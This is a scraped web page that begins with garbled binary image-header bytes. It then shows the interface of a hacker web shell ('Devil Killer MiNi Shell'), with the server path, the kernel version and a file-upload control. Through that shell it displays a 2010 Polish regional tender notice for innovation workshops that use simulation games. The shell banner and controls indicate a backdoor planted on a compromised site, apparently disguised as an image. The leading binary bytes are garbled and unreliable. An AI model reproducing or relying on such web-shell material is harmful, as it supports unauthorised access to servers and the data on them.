JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100803/207383-N-2010.html

<p class="kh_header"><b>Katowice: Usługa organizacji 4 jednodniowych warsztatów szkoleniowych w zakresie innowacyjności z wykorzystaniem gier symulacyjnych dla maksimum 80 osób - Beneficjentów Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 207383 - 2010; data zamieszczenia: 03.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Śląskie , ul. Ligonia 46, 40-037 Katowice, woj. śląskie, tel. 032 2078562, faks 032 2078578.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.silesia-region.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa organizacji 4 jednodniowych warsztatów szkoleniowych w zakresie innowacyjności z wykorzystaniem gier symulacyjnych dla maksimum 80 osób - Beneficjentów Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa organizacji 4 jednodniowych warsztatów szkoleniowych w zakresie innowacyjności z wykorzystaniem gier symulacyjnych dla maksimum 80 osób - Beneficjentów Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013. Usługa obejmuje m.in. zaprojektowanie oraz przygotowanie gry symulacyjnej, a także zorganizowanie i przeprowadzenie warsztatów szkoleniowych z jej wykorzystaniem, wraz z zapewnieniem miejsca szkolenia, materiałów szkoleniowych, wykładowcy, cateringu. 
Szczegółowy opis zamówienia: 
1. W ramach usługi Wykonawca zapewni:
A. przeprowadzenie 4 jednodniowych spotkań w formie warsztatów szkoleniowych z wykorzystaniem zapewnionej przez Wykonawcę pod potrzeby grupy docelowej gry symulacyjnej, dla 4 grup o maksymalnej liczbie 20 osób każda i nie mniejszej ilości uczestników niż 80% w ramach każdego z 4 szkoleń, na terenie Katowic,                  w październiku 2010 r., zgodnie z programem i terminami ustalonymi                         z Zamawiającym.
Wyznaczniki gry symulacyjnej:
- uczestnicy każdej grupy podzieleni na zespoły wcielają się w role, symulujące rzeczywistość biznesową,
- podejmują decyzje, które zmieniają zastaną sytuację i wpływają na zróżnicowanie osiąganych przez zespoły wyników,
- gra wykorzystuje akcesoria wpływające na jej atrakcyjność (plansze, karty, pionki, arkusze itp.),
- rozwój sytuacji w grze i osiągane wyniki są pretekstem do omówień związanych z tematem nadrzędnym warsztatów (innowacyjność i kreatywność w szczególności w projektach realizowanych w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego),
- wyniki poszczególnych zespołów są wyrażone w przyjętych miernikach, są monitorowane i stanowią element rywalizacyjny w grze.
Warsztaty mają na celu wyjaśnienie i przybliżenie tematu innowacyjności i kreatywności, zachęcenie uczestników do szukania innowacyjnych rozwiązań i kreatywnych ulepszeń w swoim otoczeniu biznesowym oraz do pozyskiwania środków UE z programów na ten cel przeznaczonych, przede wszystkim z Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013. 
Proponowany ramowy zakres merytoryczny warsztatu:
- Innowacyjność i kreatywne poszukiwanie rozwiązań - sztuka tworzenia nowych produktów, procesów i innowacyjnych metod działania - jak dostrzec to, czego na pierwszy rzut oka nie widać?
- Czym jest innowacyjność i twórcze myślenie, w szczególności w oparciu o założenia Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013? Dlaczego innowacyjność i kreatywność trzeba pielęgnować, rozwijać, i traktować jak proces, a nie jednorazowe działanie? Jakie są bariery kreatywności i twórczego myślenia i jak je usuwać?  Jakie są techniki i metody kreatywnego myślenia?
- Jak motywować i zachęcać pracowników do innowacyjności?
- Identyfikacja barier i zagrożeń utrudniających innowacyjność w biznesie oraz narzędzia pomocne w pokonywaniu tych barier - porównanie przypadków różnych firm, wymiana doświadczeń pomiędzy uczestnikami i wspólne wypracowywanie rozwiązań. 
B. eksperta z minimum trzyletnim doświadczeniem szkoleniowym, w tym min. 120 godzin w zakresie innowacyjności oraz doświadczeniem w prowadzeniu warsztatów szkoleniowych z wykorzystaniem gier symulacyjnych w ilości min. 60 godzin szkoleń; 
C. sale szkoleniowe (wraz z oddzielnym miejscem na catering i recepcję), dostępne   w godzinach od 7:30 do 16:30 z niezbędnym wyposażeniem do przeprowadzenia warsztatu szkoleniowego oraz zapleczem multimedialnym,
D. materiały szkoleniowe dla każdego uczestnika warsztatu szkoleniowego, każdorazowo akceptowane przez Zamawiającego:
- wydruk prezentacji multimedialnych przygotowanych przez ekspertów na przekazanym  przez Zamawiającego w terminie i na zasadach uzgodnionych z Zamawiającym wzorze prezentacji, wydruk: maksymalnie 4 slajdy na stronę jednostronnie, czarno-białe, dodatkowo wydruki innych materiałów przygotowanych przez ekspertów;
- wydruk w kolorze: strony tytułowej z nazwą, miejscem i datą warsztatu szkoleniowego, programem warsztatu  z podziałem na godziny;
- wydruk ankiet ewaluacyjnych wg wzoru uzgodnionego z Zamawiającym;
- wydruk prezentacji, pozostałych materiałów wraz ze stroną tytułową i programem musi być zbindowany;
- materiały dla uczestników muszą być złożone w komplet: teczka oraz długopis udostępnione w terminie i na zasadach uzgodnionych z Zamawiającym, oprawione wydruki (strony tytułowej, programu, prezentacji, innych materiałów), ankieta ewaluacyjna.
E. catering - usługa cateringowa powinna obejmować: przygotowanie, dostarczenie posiłku oraz zapewnienie sprawnej obsługi w przerwach warsztatu szkoleniowego, nakrycia oraz dekoracji stołów cateringowych, sprzątanie. Posiłki będą serwowane na zastawie porcelanowej i szklanej będącej własnością Wykonawcy.
Przed rozpoczęciem warsztatu szkoleniowego menu będzie ustalane z Zamawiającym na podstawie propozycji złożonych przez Wykonawcę tydzień przed warsztatem szkoleniowym.
F. ewaluację każdego warsztatu szkoleniowego  w postaci raportu z ankiet ewaluacyjnych zawierających oceny poszczególnych elementów warsztatu szkoleniowego oraz opinie uczestników;
G. recepcję warsztatu szkoleniowego  w postaci stanowiska przed salą szkoleniową z minimum jedną osobą (nie może być to ekspert prowadzący warsztat szkoleniowy) zajmującą się dystrybucją materiałów szkoleniowych, zbieraniem podpisów na liście obecności przekazanej w wersji elektronicznej przez Zamawiającego, obsługą techniczną oraz nadzorem nad przebiegiem warsztatu szkoleniowego. Osoba nadzorująca ze strony Wykonawcy musi być obecna przez cały czas trwania warsztatu szkoleniowego i w razie potrzeby służyć pomocą uczestnikom warsztatu szkoleniowego;
H. dokumentację fotograficzną warsztatów szkoleniowych, min. 10 zdjęć z każdego warsztatu o jakości min. 300 dpi. Zamawiający zastrzega sobie prawo wykorzystania w/w zdjęć w prowadzonych działaniach informacyjno-promocyjnych;
I. film promocyjny;
J. broszurę informacyjno-promocyjną.
2. Uczestnikami warsztatów szkoleniowych będą Beneficjenci Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 - do 80 osób. Rekrutacja uczestników należy do Zamawiającego. 
3. Warsztaty szkoleniowe powinny być przeprowadzone w Katowicach, w miejscu umożliwiającym dogodny dojazd komunikacją miejską. 
4. Warsztaty szkoleniowe  zostaną zorganizowane do końca października (w dniach od poniedziałku do piątku). Szczegółowe daty zostaną uzgodnione z Zamawiającym. 
5. Program każdego warsztatu szkoleniowego powinien uwzględniać czas na dyskusje i wnioski podsumowujące daną tematykę. 
6. Czas trwania warsztatów szkoleniowych: przeprowadzenie szkolenia przez eksperta w wymiarze minimum 6 godzin zegarowych.
7. Tematyka warsztatów szkoleniowych: innowacyjność  i kreatywność w szczególności w projektach realizowanych w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego.
Ilość osób biorących udział w warsztatach szkoleniowych wskazana w specyfikacji istotnych warunków zamówienia stanowi maksymalną ilość. Zamawiający zastrzega sobie możliwość rekrutacji mniejszej ilości uczestników warsztatów szkoleniowych, niż wykazana w siwz, jednak nie mniejszej niż 80% w ramach każdego z 4 warsztatów szkoleniowych, a Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu. 
W ramach zamówienia Wykonawca jest zobowiązany do:
w zakresie organizacji warsztatu szkoleniowego :
1) Zaproponowania miejsca oraz wskazania terminów poszczególnych warsztatów.
2) Przesłania w wersji elektronicznej szczegółowego programu warsztatu szkoleniowego nie później niż na 13 dni przed terminem warsztatu szkoleniowego  w celu umieszczenia go na stronie internetowej www.rpo.silesia-region.pl
3) Wydruk listy obecności oraz zebranie podpisów od uczestników warsztatu szkoleniowego.
4) Oficjalne rozpoczęcie warsztatu szkoleniowego: poinformowanie uczestników o źródłach finansowania warsztatu, prezentacja uczestnikom warsztatu  eksperta, tematu i programu warsztatu szkoleniowego, zasad przekazywania ankiet ewaluacyjnych.
5) Przeprowadzenie warsztatu szkoleniowego przez eksperta w wymiarze minimum 6 godzin zegarowych.
6) Zapewnienie recepcji szkolenia z co najmniej 1 osobą obecną przez cały czas trwania warsztatu szkoleniowego.
W zakresie materiałów szkoleniowych:
1) Umieszczenie na materiałach szkoleniowych i prezentacji multimedialnej zestawu logotypów przekazanych przez Zamawiającego oraz zapisu: projekt finansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego  na lata 2007-2013.
2) Dostarczenie Zamawiającemu w wersji elektronicznej prezentacji multimedialnej opracowanej na warsztat szkoleniowy, w celu umieszczenia jej na ogólnodostępnej stronie internetowej http://rpo.silesia-region.pl.
3) Dystrybucja materiałów szkoleniowych wśród uczestników warsztatu szkoleniowego przed rozpoczęciem warsztatu.
4) Dołączenie do materiałów szkoleniowych wszystkich materiałów dodatkowych udostępnionych przez Zamawiającego (np.: materiałów promocyjnych-ulotek, gadżetów) oraz dostarczenie ich na miejsce szkolenia i zwrot materiałów pozostałych po zakończeniu warsztatu szkoleniowego do siedziby Zamawiającego na zasadach i w terminie uzgodnionym z Zamawiającym.
5) Umieszczenie w sali szkoleniowej banneru udostępnionego przez Zamawiającego.
W zakresie ewaluacji:
1) Zebranie od uczestników warsztatu szkoleniowego ankiet ewaluacyjnych po zakończeniu każdego z  cyklu 4 szkoleń.
2) Dokonanie analizy ankiet ewaluacyjnych oraz dostarczenie wyników ewaluacji warsztatu szkoleniowego  wraz z ankietami ewaluacyjnymi nie później niż 10 dni od dnia zakończenia całego cyklu 4 warsztatów szkoleniowych.
W zakresie filmu promocyjnego:
1) Dostarczenie Zamawiającemu filmu promocyjnego, podsumowującego wypracowane efekty przeprowadzonych warsztatów z zakresu Innowacyjności.
2) Film powinien trwać 7 minut, powinien zawierać nagrania z warsztatów szkoleniowych, autorski podkład muzyczny i grafikę (min. 2 różne grupy warsztatowe, wywiady z wskazanymi beneficjentami z regionu spośród uczestników warsztatów szkoleniowych).
3) Film powinien zostać dostarczony w formie elektronicznej, nie później niż  21 dni od daty ostatniego z 4 warsztatów szkoleniowych.
4) Wykonawca przekaże Zamawiającemu prawa autorskie do filmu.
W zakresie broszury informacyjno-promocyjnej:
1) Dostarczenie Zamawiającemu broszury informacyjno-promocyjnej dotyczącej Innowacyjności, ze szczególnym położeniem nacisku na Innowacyjność w projektach realizowanych w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.
2) Broszura powinna mieć 12 stron A4 tekstu wraz ze zdjęciami + okładka.
3) Broszura powinna zostać dostarczona w formie drukowanej, nie później niż 21 dni od daty ostatniego warsztatu.
4) Wykonawca w trakcie przygotowania broszury na bieżąco będzie konsultował  z Zamawiającym jej treść.
5) Wykonawca przekaże Zamawiającemu prawa autorskie do broszury.
Parametry broszury:
Okładka: papier kreda mat 250g; Druk 4/4 pełny kolor + lakier matowy
Środek: papier kreda mat 170g
Druk 4/4 pełny kolor + lakier matowy
Oprawa: Szycie 2 zszywkami
Ilość: 1000 sztuk
W ramach zamówienia Zamawiający jest zobowiązany do:
w zakresie organizacji warsztatu szkoleniowego:
1) Akceptacji miejsca, terminu oraz programu warsztatu szkoleniowego  nie później niż 10 dni przed warsztatem.
2) Powiadomienia wykonawcy nie później niż 5 dni przed warsztatem szkoleniowym o faktycznej liczbie osób, która będzie uczestniczyć w warsztacie . Zamawiający określi tę liczbę na podstawie przeprowadzonej rekrutacji i wysłanych do uczestników potwierdzeń.
3) Dostarczenia Wykonawcy w wersji elektronicznej listy uczestników najpóźniej dzień przed warsztatem szkoleniowym.
W zakresie materiałów szkoleniowych:
1) Akceptacji materiałów szkoleniowych.
2) Udostępnienia Wykonawcy dodatkowych materiałów, np. teczek wraz z długopisami w formie i terminie ustalonymi z Wykonawcą.
3) Udostępnienia Wykonawcy banneru w formie i terminie ustalonymi z Wykonawcą w celu umieszczenia go na sali szkoleniowej.
W zakresie ewaluacji:
1) Przekazania Wykonawcy wzoru ankiet ewaluacyjnych niezwłocznie po podpisaniu umowy (ankieta: 2 strony w formacie A4, wydruk dwustronny).
W zakresie filmu:
1) Dokonanie kolaudacji filmu do 3 dni od daty jego przekazania Zamawiającemu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia, wymienionego w pkt III.4.1).
Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie:
1) przynajmniej 2 usługi polegające na organizacji oraz przeprowadzeniu szkoleń/warsztatów szkoleniowych z innowacji i
2) przynajmniej 1 usługę  polegającą na organizacji oraz przeprowadzeniu szkoleń/warsztatów z dowolnej tematyki  o wartości co najmniej 25 000,00 zł brutto.
Ocena spełniania ww. warunku udziału w postępowaniu, zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt III.4.1).
Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia, wymienionego w pkt III.4.1).
Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca wykaże, że przy wykonywaniu przedmiotowego zamówienia będzie uczestniczyć co najmniej 1 trener z min. trzyletnim doświadczeniem szkoleniowym posiadający:
- doświadczenie w przeprowadzaniu szkoleń  w wymiarze minimum 120 godzin szkoleniowych w zakresie innowacyjności w ciągu ostatnich 3 lat przed upływem terminu składania ofert i
- doświadczenie w przeprowadzeniu szkoleń/warsztatów szkoleniowych z wykorzystaniem gier symulacyjnych w wymiarze min. 60 godzin szkoleniowych w ciągu ostatnich 3 lat przed upływem terminu składania ofert.         
Ocena spełniania ww. warunku udziału w postępowaniu, zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt III.4.1).
Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia, wymienionego w pkt III.4.1).
Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu Wykonawca winien dołączyć do oferty w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty i oświadczenia, o których mowa:
w pkt III.4.1) winny być złożone w taki sposób, aby warunki, o których mowa
w pkt III.3) Wykonawcy występujący wspólnie spełnili łącznie,
w pkt III.4.2) składa odrębnie każdy z Wykonawców występujących wspólnie.
3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę
lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty,powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4. Wszystkie dołączone dokumenty, winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia
oraz w przypadku podmiotów, o których mowa w pkt III.4.2) kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów powinny być poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty.
6. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
